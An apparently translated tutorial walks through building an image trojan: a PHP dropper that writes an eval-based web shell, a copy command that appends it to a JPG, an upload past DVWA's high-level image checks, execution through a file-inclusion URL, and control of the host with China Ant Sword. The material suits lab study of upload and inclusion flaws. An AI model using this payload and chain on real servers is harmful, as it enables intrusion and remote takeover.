foreword
Note: The article is only for network security learning! ! !
In the above, we briefly explained the relevant content of a sentence Trojan horse
Link above: PHP one-sentence Trojan horse @eval($_POST['hack']); Statement analysis and target machine demonstration
Usually, we also face the filter of file type and size by the defender. It is also possible to collect pictures if it is stipulated that only pictures can be uploaded. Even if the attacker changes the file type, it will be blocked.
At this time, we need a real picture as a cover, and use steganography to write the Trojan horse into the picture to bypass the defense.
Image trojan
Steganography:
Steganography is a technique and science about information hiding. The so-called information hiding refers to not letting anyone except the intended recipient know the transmission event or the content of the information.
The purpose of steganography: use the surface of normal digital carriers such as still images, digital audio and video signals as a cover to hide secret information in them. The embedding of additional data does not change the visual and auditory effects of the carrier signal, nor does it change the size and format of the computer file (including the file header), so that covert information can be transmitted in an unknown way
The most used in the field of steganography is to write the content to be steganographically into the picture in binary form.
Steganographic method:
First we prepare a normal picture and a php Trojan file
The code of the php Trojan file is as follows:
<?php fputs(fopen('hack.php','w'),'<?php @eval($_POST[hack]);?>'); ?>Then open the cmd terminal and execute the following copy command
copy logo.jpg/b+hack.php/a hack.jpgWhere /b means binary file, /a means ASCII code file
You can see that the hack.jpg generated in the figure is the generated picture Trojan
We open the Trojan horse picture file, we can see that the Trojan horse has been written to the end of the picture file
Target demo
We open the DVWA shooting range, select the "high" security level, and find the file upload
Then view the source code
<?php
if( isset( $_POST[ 'Upload' ] ) ) {
// Where are we going to be writing to?
$target_path = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/";
$target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] );
// File information
$uploaded_name = $_FILES[ 'uploaded' ][ 'name' ];
$uploaded_ext = substr( $uploaded_name, strrpos( $uploaded_name, '.' ) + 1);
$uploaded_size = $_FILES[ 'uploaded' ][ 'size' ];
$uploaded_tmp = $_FILES[ 'uploaded' ][ 'tmp_name' ];
// Is it an image?
if( ( strtolower( $uploaded_ext ) == "jpg" || strtolower( $uploaded_ext ) == "jpeg" || strtolower( $uploaded_ext ) == "png" ) &&
( $uploaded_size < 100000 ) &&
getimagesize( $uploaded_tmp ) ) {
// Can we move the file to the upload folder?
if( !move_uploaded_file( $uploaded_tmp, $target_path ) ) {
// No
echo '<pre>Your image was not uploaded.</pre>';
}
else {
// Yes!
echo "<pre>{$target_path} succesfully uploaded!</pre>";
}
}
else {
// Invalid file
echo '<pre>Your image was not uploaded. We can only accept JPEG or PNG images.</pre>';
}
}
?>It is found that only jpg, jpeg, and png files are allowed, and the getimagesize() function also restricts the file header of the uploaded file to be an image type
At this time, the picture Trojan just made can be used. We upload the picture, and the file upload address is echoed.
Then we use the DVWA file to contain the vulnerability, click on file1.php
Change the URL bar to
?page=file1.phpChange to the following command to access the hack.jpg just uploaded
?page=file:///D:\phpStudy\phpstudy_pro\WWW\DVWA\hackable\uploads\hack.jpgThe page echoes the following
At this time, the hack.php Trojan file has been automatically generated in the DVWA file containing the vulnerability directory
We open "China Ant Sword" and try to connect to the website host
The connection is successful and the target host is successfully controlled
So far, we combined the file upload vulnerability and file inclusion vulnerability, implanted a one-sentence Trojan horse in the website host that can only upload pictures, and successfully connected to control the target website host